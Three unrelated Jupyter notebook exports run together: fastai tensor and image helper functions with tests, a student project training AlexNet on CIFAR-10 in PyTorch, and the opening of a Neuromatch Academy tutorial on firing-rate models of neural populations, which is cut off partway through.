test_eq(t2.type(), "torch.cuda.LongTensor")
test_eq(t3.type(), "torch.cuda.LongTensor")
#export
def to_cpu(b):
"Recursively map lists of tensors in `b` to the cpu."
return to_device(b,'cpu')
t3 = to_cpu(t3)
test_eq(t3.type(), "torch.LongTensor")
test_eq(t3, 2)
# #export
# def to_np(x):
# "Convert a tensor to a numpy array."
# return apply(Self.detach().cpu().numpy(), x)
#export
def to_np(x):
"Convert a tensor to a numpy array."
return apply(lambda o: o.data.cpu().numpy(), x)
t3 = to_np(t3)
test_eq(type(t3), np.ndarray)
test_eq(t3, 2)
#export
def item_find(x, idx=0):
"Recursively takes the `idx`-th element of `x`"
if is_listy(x): return item_find(x[idx])
if isinstance(x,dict):
key = list(x.keys())[idx] if isinstance(idx, int) else idx
return item_find(x[key])
return x
#export
def find_device(b):
"Recursively search the device of `b`."
return item_find(b).device
dev = default_device()
test_eq(find_device(t2), dev)
test_eq(find_device([t2,t2]), dev)
test_eq(find_device({'a':t2,'b':t2}), dev)
test_eq(find_device({'a':[[t2],[t2]],'b':t2}), dev)
#export
def find_bs(b):
"Recursively search the batch size of `b`."
return item_find(b).shape[0]
x = torch.randn(4,5)
test_eq(find_bs(x), 4)
test_eq(find_bs([x, x]), 4)
test_eq(find_bs({'a':x,'b':x}), 4)
test_eq(find_bs({'a':[[x],[x]],'b':x}), 4)
def np_func(f):
"Convert a function taking and returning numpy arrays to one taking and returning tensors"
def _inner(*args, **kwargs):
nargs = [to_np(arg) if isinstance(arg,Tensor) else arg for arg in args]
return tensor(f(*nargs, **kwargs))
functools.update_wrapper(_inner, f)
return _inner
```
This decorator is particularly useful for using numpy functions as fastai metrics, for instance:
```
from sklearn.metrics import f1_score
@np_func
def f1(inp,targ): return f1_score(targ, inp)
a1,a2 = array([0,1,1]),array([1,0,1])
t = f1(tensor(a1),tensor(a2))
test_eq(f1_score(a1,a2), t)
assert isinstance(t,Tensor)
#export
class Module(nn.Module, metaclass=PrePostInitMeta):
"Same as `nn.Module`, but no need for subclasses to call `super().__init__`"
def __pre_init__(self): super().__init__()
def __init__(self): pass
show_doc(Module, title_level=3)
class _T(Module):
def __init__(self): self.f = nn.Linear(1,1)
def forward(self,x): return self.f(x)
t = _T()
t(tensor([1.]))
# export
def one_hot(x, c):
"One-hot encode `x` with `c` classes."
res = torch.zeros(c, dtype=torch.uint8)
res[L(x)] = 1.
return res
test_eq(one_hot([1,4], 5), tensor(0,1,0,0,1).byte())
test_eq(one_hot([], 5), tensor(0,0,0,0,0).byte())
test_eq(one_hot(2, 5), tensor(0,0,1,0,0).byte())
#export
def one_hot_decode(x, vocab=None):
return L(vocab[i] if vocab else i for i,x_ in enumerate(x) if x_==1)
test_eq(one_hot_decode(tensor(0,1,0,0,1)), [1,4])
test_eq(one_hot_decode(tensor(0,0,0,0,0)), [ ])
test_eq(one_hot_decode(tensor(0,0,1,0,0)), [2 ])
#export
def trainable_params(m):
"Return all trainable parameters of `m`"
return [p for p in m.parameters() if p.requires_grad]
m = nn.Linear(4,5)
test_eq(trainable_params(m), [m.weight, m.bias])
m.weight.requires_grad_(False)
test_eq(trainable_params(m), [m.bias])
#export
def bn_bias_params(m):
"Return all bias and BatchNorm parameters"
if isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)): return list(m.parameters())
res = sum([bn_bias_params(c) for c in m.children()], [])
if hasattr(m, 'bias'): res.append(m.bias)
return res
model = nn.Sequential(nn.Linear(10,20), nn.BatchNorm1d(20), nn.Conv1d(3,4, 3))
test_eq(bn_bias_params(model), [model[0].bias, model[1].weight, model[1].bias, model[2].bias])
model = nn.ModuleList([nn.Linear(10,20), nn.Sequential(nn.BatchNorm1d(20), nn.Conv1d(3,4, 3))])
test_eq(bn_bias_params(model), [model[0].bias, model[1][0].weight, model[1][0].bias, model[1][1].bias])
```
### Image helpers
```
#export
def make_cross_image(bw=True):
"Create a tensor containing a cross image, either `bw` (True) or color"
if bw:
im = torch.zeros(5,5)
im[2,:] = 1.
im[:,2] = 1.
else:
im = torch.zeros(3,5,5)
im[0,2,:] = 1.
im[1,:,2] = 1.
return im
plt.imshow(make_cross_image(), cmap="Greys");
plt.imshow(make_cross_image(False).permute(1,2,0));
#export
def show_title(o, ax=None, ctx=None, label=None, **kwargs):
"Set title of `ax` to `o`, or print `o` if `ax` is `None`"
ax = ifnone(ax,ctx)
if ax is None: print(o)
elif hasattr(ax, 'set_title'): ax.set_title(o)
elif isinstance(ax, pd.Series):
while label in ax: label += '_'
ax = ax.append(pd.Series({label: o}))
return ax
test_stdout(lambda: show_title("title"), "title")
# ensure that col names are unique when showing to a pandas series
assert show_title("title", ctx=pd.Series(dict(a=1)), label='a').equals(pd.Series(dict(a=1,a_='title')))
#export
def show_image(im, ax=None, figsize=None, title=None, ctx=None, **kwargs):
"Show a PIL or PyTorch image on `ax`."
ax = ifnone(ax,ctx)
if ax is None: _,ax = plt.subplots(figsize=figsize)
# Handle pytorch axis order
if isinstance(im,Tensor):
im = to_cpu(im)
if im.shape[0]<5: im=im.permute(1,2,0)
elif not isinstance(im,np.ndarray): im=array(im)
# Handle 1-channel images
if im.shape[-1]==1: im=im[...,0]
ax.imshow(im, **kwargs)
if title is not None: ax.set_title(title)
ax.axis('off')
return ax
```
`show_image` can show b&w images...
```
im = make_cross_image()
ax = show_image(im, cmap="Greys", figsize=(2,2))
```
...and color images with standard `c*h*w` dim order...
```
im2 = make_cross_image(False)
ax = show_image(im2, figsize=(2,2))
```
...and color images with `h*w*c` dim order...
```
im3 = im2.permute(1,2,0)
ax = show_image(im3, figsize=(2,2))
ax = show_image(im, cmap="Greys", figsize=(2,2))
show_title("Cross", ax)
#export
def show_titled_image(o, **kwargs):
"Call `show_image` destructuring `o` to `(img,title)`"
show_image(o[0], title=str(o[1]), **kwargs)
#export
def show_image_batch(b, show=show_titled_image, items=9, cols=3, figsize=None, **kwargs):
"Display batch `b` in a grid of size `items` with `cols` width"
rows = (items+cols-1) // cols
if figsize is None: figsize = (cols*3, rows*3)
fig,axs = plt.subplots(rows, cols, figsize=figsize)
for *o,ax in zip(*to_cpu(b), axs.flatten()): show(o, ax=ax, **kwargs)
show_image_batch(([im,im2,im3],['bw','chw','hwc']), items=3)
```
# Export -
```
#hide
from local.notebook.export import notebook2script
notebook2script(all_fs=True)
```
# COMP551: Project 4
```
import pandas as pd
import torch
import torchvision
from PIL import Image
import torchvision.transforms as transforms
import numpy as np
from torch.utils.data import DataLoader, Dataset, TensorDataset
# Load the Drive helper and mount
from google.colab import drive
# This will prompt for authorization.
drive.mount('/content/drive')
transform = transforms.Compose([transforms.Resize((32, 32)),  # Resize takes a (h, w) tuple; a second positional arg would be interpreted as interpolation
transforms.ToTensor(),
#transforms.Lambda(lambda x: x.repeat(3,1,1)),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
training_dataset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)
validation_dataset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(training_dataset, batch_size=100, shuffle=True,num_workers=2)
validloader = torch.utils.data.DataLoader(validation_dataset, batch_size = 100, shuffle=False,num_workers=2)
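# (Added illustrative check, not in the original notebook) the Normalize
# transform above uses mean 0.5 and std 0.5 per channel, so it maps
# ToTensor's [0, 1] pixel range onto [-1, 1] via (x - 0.5) / 0.5:
x_demo = torch.tensor([0.0, 0.5, 1.0])
print((x_demo - 0.5) / 0.5)  # -> [-1., 0., 1.]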
#*********************************************************************
# model part
import torchvision.models as models
# use pretrained model:
model = models.alexnet(pretrained = True)
# import OrderedDict to correctly align the network layers
print(model)
#import nn to modify features
from collections import OrderedDict
from torch import nn
# change the features to handle the small output size produced by image reduction
features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
nn.Conv2d(64, 192, kernel_size=5, padding=2),
nn.ReLU(inplace=True),
# nn.MaxPool2d(kernel_size=3, stride=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2),
)
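# (Added illustrative check, not in the original notebook) with a 32x32
# input the modified feature extractor outputs 256x1x1; AlexNet's
# AdaptiveAvgPool2d((6, 6)) then expands this to 256*6*6 = 9216 features,
# which is what the classifier defined below expects.
out_demo = features(torch.zeros(1, 3, 32, 32))
print(out_demo.shape)  # torch.Size([1, 256, 1, 1])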
model.features= features
# create a classifier that fits our number of outputs
classifier = nn.Sequential(
nn.Dropout(p=0.5),
nn.Linear(in_features=9216, out_features=4096, bias=True),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(in_features=4096, out_features=4096, bias=True),
nn.ReLU(),
nn.Linear(in_features=4096, out_features=10, bias=True)
)
#replace the model's classifier with this new classifier
model.classifier = classifier
print(model)
#import optimizer:
from torch import optim
#define criteria and optimizer
# Note that other losses or optimizers can also be tried
criteria = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr = 0.0003, momentum=0.9)
#train model
#define training function
def train (model, loader, criterion, gpu):
model.train()
current_loss = 0
current_correct = 0
for train, y_train in iter(loader):
if gpu:
train, y_train = train.to('cuda'), y_train.to('cuda')
optimizer.zero_grad()
output = model.forward(train)
_, preds = torch.max(output,1)
loss = criterion(output, y_train)
loss.backward()
optimizer.step()
current_loss += loss.item()*train.size(0)
current_correct += torch.sum(preds == y_train.data)
#check if the training is correct: print(preds,y_train,current_correct,current_loss)
    # average over the number of samples (current_loss already sums loss.item() * batch_size per batch)
    epoch_loss = current_loss / len(loader.dataset)
    epoch_acc = current_correct.double() / len(loader.dataset)
    return epoch_loss, epoch_acc
#define validation function
def validation (model, loader, criterion, gpu):
model.eval()
valid_loss = 0
valid_correct = 0
for valid, y_valid in iter(loader):
if gpu:
valid, y_valid = valid.to('cuda'), y_valid.to('cuda')
output = model.forward(valid)
_, preds = torch.max(output,1)
valid_loss += criterion(output, y_valid).item()*valid.size(0)
valid_correct += torch.sum(preds == y_valid.data)
    epoch_loss = valid_loss / len(loader.dataset)
    epoch_acc = valid_correct.double() / len(loader.dataset)
    return epoch_loss, epoch_acc
#define test function: collect per-sample predictions on unlabelled data
def test(model, loader, gpu):
    model.eval()
    all_preds = []
    with torch.no_grad():
        for x_test, _ in loader:
            if gpu:
                x_test = x_test.to('cuda')
            output = model(x_test)
            _, preds = torch.max(output, 1)
            all_preds.append(preds.cpu())
    return torch.cat(all_preds)
# training
# send model to GPU; if not using a GPU, delete the next line
model.to('cuda')
train_losses =[]
train_acc =[]
valid_losses=[]
valid_acc =[]
#Initialize training params
# Note: the attribute for freezing is `requires_grad` (with an "s");
# the original `param.require_grad = False` silently created a new
# attribute and froze nothing. Since both `features` and `classifier`
# were replaced above, every layer is newly initialized and must stay
# trainable, so no freezing is done here:
# for param in model.parameters():
#     param.requires_grad = False
# define number of epochs
epochs = 16
epoch = 0
for e in range(epochs):
epoch +=1
print(epoch)
#train:
with torch.set_grad_enabled(True):
epoch_train_loss, epoch_train_acc = train(model,trainloader, criteria, 1)
train_losses.append(epoch_train_loss)
train_acc.append(epoch_train_acc)
print("Epoch: {} Train Loss : {:.4f} Train Accuracy: {:.4f}".format(epoch,epoch_train_loss,epoch_train_acc))
#Validation: activate the next block when validation results are needed:
with torch.no_grad():
epoch_val_loss, epoch_val_acc = validation(model, validloader, criteria, 1)
valid_losses.append(epoch_val_loss)
valid_acc.append(epoch_val_acc)
print("Epoch: {} Validation Loss : {:.4f} Validation Accuracy {:.4f}".format(epoch,epoch_val_loss,epoch_val_acc))
#Plot training and validation losses
import matplotlib.pyplot as plt
import numpy as np
plt.plot(train_losses, label='Training loss')
plt.plot(valid_losses, label='Validation loss')
plt.legend()
#Plot training and validation accuracy
plt.plot(train_acc, label='Training accuracy')
plt.plot(valid_acc, label='Validation accuracy')
plt.legend()
# for variety, lets use altair to do the plot
import altair as alt
# create a pandas dataframe for the loss
df = pd.DataFrame({
'epoch': range(1, len(train_losses) + 1),
'train': train_losses,
'valid': valid_losses
})
# unpivot to have cols [epoch, dataset, loss]
df = df.melt(id_vars=['epoch'],
value_vars=['train', 'valid'],
value_name='loss',
var_name='Dataset')
# line plot with altair
alt.Chart(df).mark_line(point=True)\
.encode(x='epoch', y='loss', color='Dataset')\
.interactive()
```
<a href="https://colab.research.google.com/github/NeuromatchAcademy/course-content/blob/master/tutorials/W2D4_DynamicNetworks/W2D4_Tutorial1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Tutorial 1: Neural Rate Models
**Week 2, Day 4: Dynamic Networks**
**By Neuromatch Academy**
__Content creators:__ Qinglong Gu, Songtin Li, Arvind Kumar, John Murray, Julijana Gjorgjieva
__Content reviewers:__ Maryam Vaziri-Pashkam, Ella Batty, Lorenzo Fontolan, Richard Gao, Spiros Chavlis, Michael Waskom
---
# Tutorial Objectives
The brain is a complex system, not because it is composed of a large number of diverse types of neurons, but mainly because of how neurons are connected to each other. The brain is indeed a network of highly specialized neuronal networks.
The activity of a neural network constantly evolves in time. For this reason, neurons can be modeled as dynamical systems. The dynamical system approach is only one of the many modeling approaches that computational neuroscientists have developed (other points of view include information processing, statistical models, etc.).
How the dynamics of neuronal networks affect the representation and processing of information in the brain is an open question. However, signatures of altered brain dynamics present in many brain diseases (e.g., in epilepsy or Parkinson's disease) tell us that it is crucial to study network activity dynamics if we want to understand the brain.
In this tutorial, we will simulate and study one of the simplest models of biological neuronal networks. Instead of modeling and simulating individual excitatory neurons (e.g., LIF models that you implemented yesterday), we will treat them as a single homogeneous population and approximate their dynamics using a single one-dimensional equation describing the evolution of their average spiking rate in time.
In this tutorial, we will learn how to build a firing rate model of a single population of excitatory neurons.
**Steps:**
- Write the equation for the firing rate dynamics of a 1D excitatory population.
- Visualize the response of the population as a function of parameters such as threshold level and gain, using the frequency-current (F-I) curve.
- Numerically simulate the dynamics of the excitatory population and find the fixed points of the system.
- Investigate the stability of the fixed points by linearizing the dynamics around them.
---
# Setup
```
# Imports
import matplotlib.pyplot as plt
import numpy as np
import scipy.optimize as opt # root-finding algorithm
# @title Figure Settings
import ipywidgets as widgets # interactive display
%config InlineBackend.figure_format = 'retina'
plt.style.use("https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/nma.mplstyle")
# @title Helper functions
def plot_fI(x, f):
plt.figure(figsize=(6, 4)) # plot the figure
plt.plot(x, f, 'k')
plt.xlabel('x (a.u.)', fontsize=14)
plt.ylabel('F(x)', fontsize=14)
plt.show()
def plot_dr_r(r, drdt, x_fps=None):
plt.figure()
plt.plot(r, drdt, 'k')
plt.plot(r, 0. * r, 'k--')
if x_fps is not None:
plt.plot(x_fps, np.zeros_like(x_fps), "ko", ms=12)
plt.xlabel(r'$r$')
plt.ylabel(r'$\frac{dr}{dt}$', fontsize=20)
plt.ylim(-0.1, 0.1)
def plot_dFdt(x, dFdt):
plt.figure()
plt.plot(x, dFdt, 'r')
plt.xlabel('x (a.u.)', fontsize=14)
plt.ylabel('dF(x)', fontsize=14)
plt.show()
```
---
# Section 1: Neuronal network dynamics
```
# @title Video 1: Dynamic networks
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="p848349hPyw", width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
```
## Section 1.1: Dynamics of a single excitatory population
Individual neurons respond by spiking. When we average the spikes of neurons in a population, we can define the average firing activity of the population. In this model, we are interested in how the population-averaged firing varies as a function of time and network parameters. Mathematically, we can describe the firing rate dynamics as:
\begin{align}
\tau \frac{dr}{dt} &= -r + F(w\cdot r + I_{\text{ext}}) \quad\qquad (1)
\end{align}
$r(t)$ represents the average firing rate of the excitatory population at time $t$, $\tau$ controls the timescale of the evolution of the average firing rate, $w$ denotes the strength (synaptic weight) of the recurrent input to the population, $I_{\text{ext}}$ represents the external input, and the transfer function $F(\cdot)$ (which can be related to f-I curve of individual neurons described in the next sections) represents the population activation function in response to all received inputs.
To start building the model, please execute the cell below to initialize the simulation parameters.
```
# @markdown *Execute this cell to set default parameters for a single excitatory population model*
def default_pars_single(**kwargs):
pars = {}
# Excitatory parameters
pars['tau'] = 1. # Timescale of the E population [ms]
pars['a'] = 1.2 # Gain of the E population
pars['theta'] = 2.8 # Threshold of the E population
# Connection strength
pars['w'] = 0. # E to E, we first set it to 0
# External input
pars['I_ext'] = 0.
# simulation parameters
pars['T'] = 20. # Total duration of simulation [ms]
pars['dt'] = .1 # Simulation time step [ms]
pars['r_init'] = 0.2 # Initial value of E
# External parameters if any
pars.update(kwargs)
# Vector of discretized time points [ms]
pars['range_t'] = np.arange(0, pars['T'], pars['dt'])
return pars
```
You can now use:
- `pars = default_pars_single()` to get all the parameters, and then you can execute `print(pars)` to check these parameters.
- `pars = default_pars_single(T=T_sim, dt=time_step)` to set new simulation time and time step
- To update an existing parameter dictionary, use `pars['New_para'] = value`
Because `pars` is a dictionary, it can be passed to a function that requires individual parameters as arguments using `my_func(**pars)` syntax.
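For instance (an illustrative sketch, not part of the tutorial), a function only needs to name the parameters it uses; any extra dictionary keys are absorbed by `**other_pars`:

```
def steps_per_tau(tau, dt, **other_pars):
  # number of Euler steps per time constant
  return round(tau / dt)

pars_demo = {'tau': 1., 'dt': .1, 'theta': 2.8, 'w': 0.}
print(steps_per_tau(**pars_demo))  # 10
```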
## Section 1.2: F-I curves
In electrophysiology, a neuron is often characterized by its spike rate output in response to input currents. This is often called the **F-I** curve, denoting the output spike frequency (**F**) in response to different injected currents (**I**). We estimated this for an LIF neuron in yesterday's tutorial.
The transfer function $F(\cdot)$ in Equation $1$ represents the gain of the population as a function of the total input. The gain is often modeled as a sigmoidal function, i.e., more input drive leads to a nonlinear increase in the population firing rate. The output firing rate will eventually saturate for high input values.
A sigmoidal $F(\cdot)$ is parameterized by its gain $a$ and threshold $\theta$.
$$ F(x;a,\theta) = \frac{1}{1+\text{e}^{-a(x-\theta)}} - \frac{1}{1+\text{e}^{a\theta}} \quad(2)$$
The argument $x$ represents the input to the population. Note that the second term is chosen so that $F(0;a,\theta)=0$.
Many other transfer functions (generally monotonic) can also be used. Examples are the rectified linear function $ReLU(x)$ or the hyperbolic tangent $tanh(x)$.
### Exercise 1: Implement F-I curve
Let's first investigate the activation functions before simulating the dynamics of the entire population.
In this exercise, you will implement a sigmoidal **F-I** curve or transfer function $F(x)$, with gain $a$ and threshold level $\theta$ as parameters.
```
def F(x, a, theta):
"""
Population activation function.
Args:
x (float): the population input
a (float): the gain of the function
theta (float): the threshold of the function
Returns:
float: the population activation response F(x) for input x
"""
#################################################
## TODO for students: compute f = F(x) ##
# Fill out function and remove
  raise NotImplementedError("Student exercise: implement the f-I function")
#################################################
# Define the sigmoidal transfer function f = F(x)
f = ...
return f
pars = default_pars_single() # get default parameters
x = np.arange(0, 10, .1) # set the range of input
# Uncomment below to test your function
# f = F(x, pars['a'], pars['theta'])
# plot_fI(x, f)
# to_remove solution
def F(x, a, theta):
"""
Population activation function.
Args:
x (float): the population input
a (float): the gain of the function
theta (float): the threshold of the function
Returns:
float: the population activation response F(x) for input x
"""
# Define the sigmoidal transfer function f = F(x)
f = (1 + np.exp(-a * (x - theta)))**-1 - (1 + np.exp(a * theta))**-1
return f
pars = default_pars_single() # get default parameters
x = np.arange(0, 10, .1) # set the range of input
# Uncomment below to test your function
f = F(x, pars['a'], pars['theta'])
with plt.xkcd():
plot_fI(x, f)
```
### Interactive Demo: Parameter exploration of F-I curve
Here's an interactive demo that shows how the F-I curve changes for different values of the gain and threshold parameters. How do the gain and threshold parameters affect the F-I curve?
```
# @title
# @markdown Make sure you execute this cell to enable the widget!
def interactive_plot_FI(a, theta):
"""
Population activation function.
  Args:
a : the gain of the function
theta : the threshold of the function
Returns:
  Plots the F-I curve with the given parameters
"""
# set the range of input
x = np.arange(0, 10, .1)
plt.figure()
plt.plot(x, F(x, a, theta), 'k')
plt.xlabel('x (a.u.)', fontsize=14)
plt.ylabel('F(x)', fontsize=14)
plt.show()
_ = widgets.interact(interactive_plot_FI, a=(0.3, 3, 0.3), theta=(2, 4, 0.2))
# to_remove explanation
"""
Discussion:
For the function we have chosen to model the F-I curve (eq 2),
- a determines the slope (gain) of the rising phase of the F-I curve
- theta determines the input at which the function F(x) reaches its mid-value (0.5).
That is, theta shifts the F-I curve along the horizontal axis.
For our neurons we are using in this tutorial:
- a controls the gain of the neuron population
- theta controls the threshold at which the neuron population starts to respond
""";
```
## Section 1.3: Simulation scheme of E dynamics
Because $F(\cdot)$ is a nonlinear function, the exact solution of Equation $1$ can not be determined via analytical methods. Therefore, numerical methods must be used to find the solution. In practice, the derivative on the left-hand side of Equation $1$ can be approximated using the Euler method on a time-grid of stepsize $\Delta t$:
\begin{align}
&\frac{dr}{dt} \approx \frac{r[k+1]-r[k]}{\Delta t}
\end{align}
where $r[k] = r(k\Delta t)$.
Thus,
$$\Delta r[k] = \frac{\Delta t}{\tau}[-r[k] + F(w\cdot r[k] + I_{\text{ext}}[k];a,\theta)]$$
Hence, Equation (1) is updated at each time step by:
$$r[k+1] = r[k] + \Delta r[k]$$
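As a quick illustration of this update rule (made-up values, independent of the simulator defined next), take the $w=0$ case with a constant drive: the Euler iterates relax toward that constant with time constant $\tau$:

```
tau, dt = 1., .1
F_const, r = 0.8, 0.2  # constant drive F(.) and initial rate (illustrative values)
for k in range(round(20. / dt)):  # 20 ms of simulated time
  r = r + dt / tau * (-r + F_const)
print(round(r, 4))  # 0.8: the iterates settle at the fixed point
```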
```
# @markdown *Execute this cell to enable the single population rate model simulator: `simulate_single`*
def simulate_single(pars):
"""
Simulate an excitatory population of neurons
Args:
pars : Parameter dictionary
Returns:
rE : Activity of excitatory population (array)
Example:
pars = default_pars_single()
r = simulate_single(pars)
"""
# Set parameters
tau, a, theta = pars['tau'], pars['a'], pars['theta']
w = pars['w']
I_ext = pars['I_ext']
r_init = pars['r_init']
dt, range_t = pars['dt'], pars['range_t']
Lt = range_t.size
# Initialize activity
r = np.zeros(Lt)
r[0] = r_init
I_ext = I_ext * np.ones(Lt)
# Update the E activity
for k in range(Lt - 1):
dr = dt / tau * (-r[k] + F(w * r[k] + I_ext[k], a, theta))
r[k+1] = r[k] + dr
return r
help(simulate_single)
```
### Interactive Demo: Parameter Exploration of single population dynamics
Note that $w=0$, as in the default setting, means no recurrent input to the neuron population in Equation (1). Hence, the dynamics are entirely determined by the external input $I_{\text{ext}}$. Explore these dynamics in this interactive demo.
How does $r_{\text{sim}}(t)$ change with different $I_{\text{ext}}$ values? How does it change with different $\tau$ values? Investigate the relationship between $F(I_{\text{ext}}; a, \theta)$ and the steady value of $r(t)$.
Note that, $r_{\rm ana}(t)$ denotes the analytical solution - you will learn how this is computed in the next section.
```
# @title
# @markdown Make sure you execute this cell to enable the widget!
# get default parameters
pars = default_pars_single(T=20.)
def Myplot_E_diffI_difftau(I_ext, tau):
# set external input and time constant
pars['I_ext'] = I_ext
pars['tau'] = tau
# simulation
r = simulate_single(pars)
# Analytical Solution
r_ana = (pars['r_init']
+ (F(I_ext, pars['a'], pars['theta'])
- pars['r_init']) * (1. - np.exp(-pars['range_t'] / pars['tau'])))
# plot
plt.figure()
plt.plot(pars['range_t'], r, 'b', label=r'$r_{\mathrm{sim}}$(t)', alpha=0.5,
zorder=1)
plt.plot(pars['range_t'], r_ana, 'b--', lw=5, dashes=(2, 2),
label=r'$r_{\mathrm{ana}}$(t)', zorder=2)
plt.plot(pars['range_t'],
F(I_ext, pars['a'], pars['theta']) * np.ones(pars['range_t'].size),
'k--', label=r'$F(I_{\mathrm{ext}})$')
plt.xlabel('t (ms)', fontsize=16.)
plt.ylabel('Activity r(t)', fontsize=16.)
plt.legend(loc='best', fontsize=14.)
plt.show()
_ = widgets.interact(Myplot_E_diffI_difftau, I_ext=(0.0, 10., 1.),
tau=(1., 5., 0.2))
# to_remove explanation
"""
Discussion:
Given the choice of F-I curve (eq 2) and dynamics of the neuron population (eq. 1)
the neurons have two fixed points or steady-state responses irrespective of the input.
- Weak inputs to the neurons eventually result in the activity converging to zero
- Strong inputs to the neurons eventually result in the activity converging to max value
The time constant tau, does not affect the steady-state response but it determines
the time the neurons take to reach to their fixed point.
""";
```
## Think!
Above, we have numerically solved a system driven by a positive input. Yet, $r_E(t)$ either decays to zero or reaches a fixed non-zero value.
- Why doesn't the solution of the system "explode" in a finite time? In other words, what guarantees that $r_E$(t) stays finite?
- Which parameter would you change in order to increase the maximum value of the response?
```
# to_remove explanation
"""
Discussion:
1) As the F-I curve is bounded between zero and one, the system doesn't explode.
The f-curve guarantees this property
2) One way to increase the maximum response is to change the f-I curve. For
example, the ReLU is an unbounded function, and thus will increase the overall maximal
response of the network.
""";
```
---
# Section 2: Fixed points of the single population system
```
# @title Video 2: Fixed point
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="Ox3ELd1UFyo", width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
```
As you varied the two parameters in the last Interactive Demo, you noticed that, while at first the system output quickly changes, with time, it reaches its maximum/minimum value and does not change anymore. The value eventually reached by the system is called the **steady state** of the system, or the **fixed point**. Essentially, in the steady states the derivative with respect to time of the activity ($r$) is zero, i.e. $\displaystyle \frac{dr}{dt}=0$.
We can find the steady state of Equation (1) by setting $\displaystyle{\frac{dr}{dt}=0}$ and solving for $r$:
$$-r_{\text{steady}} + F(w\cdot r_{\text{steady}} + I_{\text{ext}};a,\theta) = 0, \qquad (3)$$
When it exists, the solution of Equation (3) defines a **fixed point** of the dynamical system in Equation (1). Note that if $F(x)$ is nonlinear, it is not always possible to find an analytical solution, but the solution can be found via numerical simulations, as we will do later.
From the Interactive Demo, one could also notice that the value of $\tau$ influences how quickly the activity will converge to the steady state from its initial value.
In the specific case of $w=0$, we can also analytically compute the solution of Equation (1) (i.e., the thick blue dashed line) and deduce the role of $\tau$ in determining the convergence to the fixed point:
$$\displaystyle{r(t) = \big{[}F(I_{\text{ext}};a,\theta) -r(t=0)\big{]} (1-\text{e}^{-\frac{t}{\tau}})} + r(t=0)$$ \\
We can now numerically calculate the fixed point with a root finding algorithm.
## Exercise 2: Visualization of the fixed points
When it is not possible to find the solution for Equation (3) analytically, a graphical approach can be taken. To that end, it is useful to plot $\displaystyle{\frac{dr}{dt}}$ as a function of $r$. The values of $r$ for which the plotted function crosses zero on the y axis correspond to fixed points.
Here, let us, for example, set $w=5.0$ and $I^{\text{ext}}=0.5$. From Equation (1), you can obtain
$$\frac{dr}{dt} = [-r + F(w\cdot r + I^{\text{ext}})]\,/\,\tau $$
Then, plot the $dr/dt$ as a function of $r$, and check for the presence of fixed points.
```
def compute_drdt(r, I_ext, w, a, theta, tau, **other_pars):
"""Given parameters, compute dr/dt as a function of r.
Args:
r (1D array) : Average firing rate of the excitatory population
I_ext, w, a, theta, tau (numbers): Simulation parameters to use
other_pars : Other simulation parameters are unused by this function
Returns
drdt function for each value of r
"""
#########################################################################
# TODO compute drdt and disable the error
raise NotImplementedError("Finish the compute_drdt function")
#########################################################################
# Calculate drdt
drdt = ...
return drdt
# Define a vector of r values and the simulation parameters
r = np.linspace(0, 1, 1000)
pars = default_pars_single(I_ext=0.5, w=5)
# Uncomment to test your function
# drdt = compute_drdt(r, **pars)
# plot_dr_r(r, drdt)
# to_remove solution
def compute_drdt(r, I_ext, w, a, theta, tau, **other_pars):
"""Given parameters, compute dr/dt as a function of r.
Args:
r (1D array) : Average firing rate of the excitatory population
I_ext, w, a, theta, tau (numbers): Simulation parameters to use
other_pars : Other simulation parameters are unused by this function
Returns
drdt function for each value of r
"""
# Calculate drdt
drdt = (-r + F(w * r + I_ext, a, theta)) / tau
return drdt
# Define a vector of r values and the simulation parameters
r = np.linspace(0, 1, 1000)
pars = default_pars_single(I_ext=0.5, w=5)
drdt = compute_drdt(r, **pars)
with plt.xkcd():
plot_dr_r(r, drdt)
```
## Exercise 3: Fixed point calculation
We will now find the fixed points numerically. To do so, we need to specify initial values ($r_{\text{guess}}$) for the root-finding algorithm to start from. From the line $\displaystyle{\frac{dr}{dt}}$ plotted above in Exercise 2, initial values can be chosen as a set of values close to where the line crosses zero on the y axis (the real fixed points).
The next cell defines three helper functions that we will use:
- `my_fp_single(r_guess, **pars)` uses a root-finding algorithm to locate a fixed point near a given initial value
- `check_fp_single(x_fp, **pars)`, verifies that the values of $r_{\rm fp}$ for which $\displaystyle{\frac{dr}{dt}} = 0$ are the true fixed points
- `my_fp_finder(r_guess_vector, **pars)` accepts an array of initial values and finds the same number of fixed points, using the above two functions
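The root-finding pattern these helpers wrap can be sketched in isolation (a toy function with a known root, not the tutorial's $F$):

```
import scipy.optimize as opt

g = lambda x: x**2 - 2.  # toy function; root at sqrt(2)
x_root = opt.root(g, x0=1.).x.item()
print(round(x_root, 4))  # 1.4142
```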
```
# @markdown *Execute this cell to enable the fixed point functions*
def my_fp_single(r_guess, a, theta, w, I_ext, **other_pars):
"""
Calculate the fixed point through drE/dt=0
Args:
r_guess : Initial value used for scipy.optimize function
a, theta, w, I_ext : simulation parameters
Returns:
x_fp : value of fixed point
"""
# define the right hand of E dynamics
def my_WCr(x):
r = x
drdt = (-r + F(w * r + I_ext, a, theta))
y = np.array(drdt)
return y
x0 = np.array(r_guess)
x_fp = opt.root(my_WCr, x0).x.item()
return x_fp
def check_fp_single(x_fp, a, theta, w, I_ext, mytol=1e-4, **other_pars):
"""
Verify |dr/dt| < mytol
Args:
fp : value of fixed point
